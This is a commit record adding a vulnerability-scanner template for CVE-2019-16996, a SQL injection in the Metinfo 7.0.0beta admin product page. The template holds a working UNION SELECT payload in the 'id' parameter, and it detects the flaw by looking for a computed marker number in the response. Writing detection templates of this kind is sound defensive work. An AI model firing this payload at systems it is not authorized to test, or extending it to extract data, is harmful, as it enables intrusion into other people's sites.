Merge pull request #4160 from ritikchaddha/patch-31

Create CVE-2019-16996.yaml
2022-04-22 18:13:31 +04:00 · 2022-04-22 18:13:31 +04:00 · 47a579f177
parent c552d7fb09 bc7436b471
commit 47a579f177
1 changed files with 28 additions and 0 deletions
--- a/cves/2019/CVE-2019-16996.yaml
+++ b/cves/2019/CVE-2019-16996.yaml
@ -0,0 +1,28 @@
+id: CVE-2019-16996
+
+info:
+  name: Metinfo7.0 beta - SQL Injection
+  author: ritikchaddha
+  severity: high
+  description: In Metinfo 7.0.0beta, a SQL Injection was discovered in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16996
+  tags: metinfo,sqli,cve,cve2019
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "1918835981"
+
+      - type: status
+        status:
+          - 200